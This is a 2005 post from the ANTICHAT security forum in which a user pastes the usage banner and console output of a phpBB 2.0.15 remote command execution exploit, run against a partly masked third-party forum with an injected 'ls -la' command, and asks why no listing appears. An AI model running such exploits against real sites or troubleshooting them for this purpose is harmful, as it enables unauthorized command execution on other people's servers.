Уязвимости форумов phpbb 2.0.15

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#36

03.08.2005, 16:11

earnest

Новичок

Регистрация: 03.08.2005

Сообщений: 1

Провел на форуме:
6482

Репутация: 0

phpBB <= 2.0.15 remote command execution exploit
by Captain Crunch Security TeaM // www.ccteam.ru or ccteam.nukleon.us
Thanks to nukleon, nori, r57. This programm just for fun! Coded by tristram.
################################################## ##########
Usage:

c99expl.phpbb2015-interactive.php [URL] [NUM] [CMD]
params:

[URL] - URL to directory where phpBB installed e.g. http://host.tld/phpBB/ or
http://host.tld/
[NUM] - number of existing topic (e.g. 10)
[CMD] - command for execute e.g. ls or "ls -la"
c99expm.phpbb2015.php http://host.tld/phpBB/ 10 ls
################################################## ##########
Enter URL: http://forum.****.lv
Enter Topic-ID: 2
Enter CMD: ls -la
Initialization exploit... OK
Processing parameters...
URL: http://forum.****.lv
HOST: forum.*****.lv
PATH:
PORT: 80
Topic-ID: 2
Execution "ls -la" result:
+%3Bls+-la%3B+echo+
bash $

помогите... почему у меня не выдает список? вроде экс. работает...